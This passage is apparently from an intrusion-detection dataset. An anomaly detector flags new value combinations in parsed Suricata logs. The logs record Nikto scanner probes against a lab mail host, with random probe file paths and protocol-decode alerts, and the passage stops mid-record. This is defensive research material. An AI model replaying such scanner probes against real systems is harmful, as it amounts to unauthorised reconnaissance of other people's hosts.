"{\"timestamp\":\"2020-03-04T19:18:34.134416+0000\",\"flow_id\":1832280276994169,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46766,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.134416, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1832280276994169,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46766,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46766,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46766,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46766, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1832280276994169,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1832280276994169, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.134416+0000\",\"flow_id\":1832280276994169,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46766,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.13 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.138294 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46768 -> 192.168.10.154:80", "/parser/model/time": 1583349514.138294, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46768, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.138294 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46768 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.14 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.TPF", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.138485+0000\",\"flow_id\":1112705751193243,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46768,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.TPF\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.TPF\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.138485, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1112705751193243,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46768,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.TPF\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.TPF\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46768,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.TPF\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.TPF\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.TPF\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.TPF\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.TPF", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.TPF", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46768,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46768, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1112705751193243,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1112705751193243, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.138485+0000\",\"flow_id\":1112705751193243,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46768,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.TPF\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.TPF\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.14 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.154534 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46770 -> 192.168.10.154:80", "/parser/model/time": 1583349514.154534, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46770, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.154534 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46770 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.15 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.SSIFilter", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.154766+0000\",\"flow_id\":124996417115902,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46770,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.SSIFilter\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.SSIFilter\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.154766, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":124996417115902,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46770,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.SSIFilter\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.SSIFilter\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46770,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.SSIFilter\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.SSIFilter\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.SSIFilter\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.SSIFilter\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.SSIFilter", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.SSIFilter", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46770,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46770, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":124996417115902,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 124996417115902, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.154766+0000\",\"flow_id\":124996417115902,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46770,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.SSIFilter\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.SSIFilter\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.15 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.156769 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46772 -> 192.168.10.154:80", "/parser/model/time": 1583349514.156769, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by 